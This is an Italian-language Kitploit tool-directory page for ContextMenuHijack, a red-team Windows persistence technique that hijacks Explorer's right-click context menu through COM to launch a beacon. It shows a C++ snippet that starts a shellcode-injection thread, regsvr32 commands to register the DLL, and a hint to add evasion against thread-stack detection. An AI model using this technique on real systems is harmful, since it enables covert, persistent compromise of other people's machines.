Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
ContextMenuHijack — Esegui un payload a ogni clic destro su un file/cartella nel menu di Esplora file per la persistenza | Kitploit
Strumenti/GitHubGitHub/ristbs/contextmenuhijack
Meccanismi di PersistenzaPost-ExploitRed TeamingSviluppo Payload
GitHubristbs/contextmenuhijack

ContextMenuHijack

Esegui un payload a ogni clic destro su un file/cartella nel menu di Esplora file per la persistenza

Vedi Repository
173273 anni faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

ContextMenuHijack

L'idea originale che mi ha ispirato viene da @NinjaParanoid:

Video

ContextMenuHijack è una semplice tecnica di persistenza che utilizza il COM hijacking basato sul comportamento umano: quando fai clic con il tasto destro su un file/cartella in Esplora file per aprire il menu contestuale, esegue allo stesso tempo il beacon che abbiamo specificato.

root@kitploit:~
IFACEMETHODIMP FileContextMenuExt::Initialize( LPCITEMIDLIST pidlFolder, LPDATAOBJECT pDataObj, HKEY hKeyProgID ) {
    DWORD tid = NULL;
    CreateThread(NULL, 1024 * 1024, (LPTHREAD_START_ROUTINE)InjectShc, NULL, 0, &tid);

    if (NULL == pDataObj) {
	if (pidlFolder != NULL) {
	}
        return S_OK;
    }
    return S_OK;
}

Utilizzo

Devi solo caricare il file della soluzione (.sln) e compilarlo. È importante sapere che servono privilegi di amministratore per usare questa tecnica di persistenza. Una volta fatto tutto, devi solo registrare il file DLL nel registro con regsvr32:

root@kitploit:~
regsvr32 "C:\path\to\ContextMenuHijack.dll"

se vuoi disinstallarlo, usa semplicemente il flag /u

root@kitploit:~
regsvr32 /u "C:\path\to\ContextMenuHijack.dll"

persistence1

  • questa tecnica può essere facilmente rilevata dallo stack dei thread di explorer.exe, sta a te usare le tue tecniche di evasione image

Crediti

  • https://github.com/rikka0w0/ExplorerContextMenuTweaker
  • https://learn.microsoft.com/en-us/windows/win32/shell/how-to-implement-the-icontextmenu-interface?redirectedfrom=MSDN
  • https://www.codeproject.com/Articles/441/The-Complete-Idiot-s-Guide-to-Writing-Shell-Extens
Scarica lo strumento